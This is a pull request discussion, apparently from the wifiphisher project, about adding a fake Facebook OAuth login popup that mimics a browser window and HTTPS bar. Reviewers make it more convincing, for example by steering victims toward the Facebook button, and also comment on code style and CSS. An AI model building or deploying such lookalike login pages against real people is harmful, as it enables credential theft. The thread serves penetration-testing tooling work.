Oauth social media Login #1187
Social media OAuth login fake popup (Mac OS, Windows, Linux, Android, iOS friendly). Notice that the popup will be launched only in Mac OS and Windows. For the other OSs it will be redirected to a Facebook login page (Twitter login and Google+ will be available in the next update).
Thanks for contributing. I'll have a look soon.
I had a look. I like how you imitate the browser and the HTTPS bar but I think the index page is not very realistic. Here's what I suggest: Instead of creating a new scenario, we can simply improve our existing "oauth-login" scenario. If the victim client is on MacOS or Windows, then we will display the "Connect to Facebook" button as in your scenario. If the victim user is on any other OS (e.g. Android), then we leave the page as it is with the existing HTML form. Feel free to update your PR with the changes and I will do a second review.
For the index, I know it's not that realistic because I started the project from scratch. If we find some good resources, that will be useful.
Added Facebook popup login and the option to enable or disable it from config.ini
I had a look at the recent changes and I think it's much better now. Good job. I'll have a closer look soon and let you know what needs to be changed.
Hi,
Thank you for working on this.
We will have to improve the code quality before merging this PR. Imagine other contributors that will want to extend your code after some time. They should find your code structured and self-explanatory. Some things to consider:
- Use proper names for variables and functions that are descriptive.
- Don't repeat the same code again and again.
- Make sure that the code is structured properly. For example, you can have a directory for each browser that you want to emulate (e.g. "firefox", "safari", etc) and put all the relevant code in there. There should be one main index.html file that should act as a "controller" that imports the right files accordingly.
- Write as many comments as possible.
When you update your code, I'll perform a second round of review.
|
||
<script> | ||
function alertee() { | ||
alert("Twitter is not available for the moment!"); |
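Review bot: the function name `alertee` on the line above the `alert(...)` call does not say what the function does or which button it belongs to. A name that states the action (for example, one that mentions the Twitter button and the "not available" notice) would make the handler self-explanatory to the next contributor.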
Instead of showing a popup window that says that Twitter is not available, we can simply do nothing when the Twitter button is pushed. This will force the user to choose the Facebook button instead.
I have a better idea. What about a variable in config.ini to choose either this alert or doing nothing, like you said?
Sure.
frames[0].requestFocus(); | ||
} | ||
|
||
function openthegoddamnwindow() { |
Pick a more descriptive name please.
Definitely will do.
@@ -0,0 +1,217 @@ | |||
body { |
This is confusing. Why do we have so many style.css files? Can we just have one?
Why there are two style.css files: the first one is for the popup page (login.html) and the second one is for the default OAuth scenario. If I used only one style.css, there would be some conflicts in both pages. I'll rename the second one.
Yes, if you want to have two, we need a more descriptive name (e.g. style-popup.css and style-form.css)
That's a good idea. I'll do it on the next update.
@@ -0,0 +1,6 @@ | |||
[info] | |||
Name: Social media Login (beta) | |||
Description: Facebook oauth login fake popup (Mac OS, Windows,Linux, Android, IOS Friendly), Notice that the popup will be launched only in Mac OS and Windows. For the other OSs it will be redirected to a facebook login page (twitter login and google+ will be available in the next update). |
Again, make sure to change the "Name" and "Description" as we discussed earlier.
This is the old template. I'll remove it and keep only the new OAuth login scenario.
Yes.
wifiphisher/data/phishing-pages/socialmedia-beta/html/static/css/fonts.css
@sophron I just cleaned up the unused files of the old commits and all changes are ready now. I commented every detail you need to know; they are mentioned in config.ini and inside the HTML files.
Okay, I will review again soon.
Hi, The code looks much better than before. A few questions:
Yeah, I have two ideas and only one of them is going to work. The first one is to rename the parts that have conflicts and then merge the style.css files; or I'll create one principal style.css which covers both pages, then I'll put the parts that have conflicts in the <style></style> part of each page.
Okay, I'll take a look and make the changes.
My bad, I'll move jsframe.js into
Merging CSS files into one style.css and moving the parts having conflicts inside the <style></style> of the pages. Removing the unused fonts folder. Adding a template for the users who want to use their own page with the popup. Creating a fully detailed documentation for the people who want to use their own page inside the popup (the documentation is inside template.html). jsframe.js has been moved to the js folder.
The source of the used JS library : https://github.com/riversun/JSFrame.js | ||
For further information about using the JS popup check : https://github.com/riversun/JSFrame.js | ||
*/ | ||
|
This documentation is nice but the best place for it is in the config.ini file.
src: url('/fonts/Lato-regular/Lato-regular.eot?#iefix') format('embedded-opentype'), | ||
local('Lato Regular'), | ||
local('Lato-regular'), | ||
url('../fonts/Lato-regular.woff2') format('woff2'); |
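Review bot: the `src` list mixes two path layouts for the same font. The `.eot` entry uses the root-absolute `/fonts/Lato-regular/Lato-regular.eot` with a per-font subdirectory, while the `.woff2` entry uses the stylesheet-relative `../fonts/Lato-regular.woff2` with no subdirectory, so at most one of them can match the tree. Pick one layout and use it for every format, or drop the `@font-face` rule if the font files are no longer shipped.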
The "fonts" directory no longer exists.
src: url('/fonts/Lato-700/Lato-700.eot?#iefix') format('embedded-opentype'), | ||
local('Lato Bold'), | ||
local('Lato-700'), | ||
url('../fonts/Lato-700.woff2') format('woff2'); |
The "fonts" directory no longer exists.
src: url('/fonts/Lato-regular/Lato-regular.eot'); | ||
src: url('/fonts/Lato-regular/Lato-regular.eot?#iefix') format('embedded-opentype'), |
The "fonts" directory no longer exists.
width:980px; | ||
padding-top:20px; | ||
} | ||
.login2-btn { |
There is no login2-btn. We can remove this.
This PR is in a much better state now. If you can remove unnecessary code and add the HTML code of the popup box on the
I'll continue the work on this and merge it soon.
Social media OAuth login fake popup. A JS popup will be launched only in Mac OS and Windows. For the other OSs (Linux, Android, iOS) it will be redirected to a Facebook login page (Twitter login and Google+ will be available in the next update).
Original idea from: #1075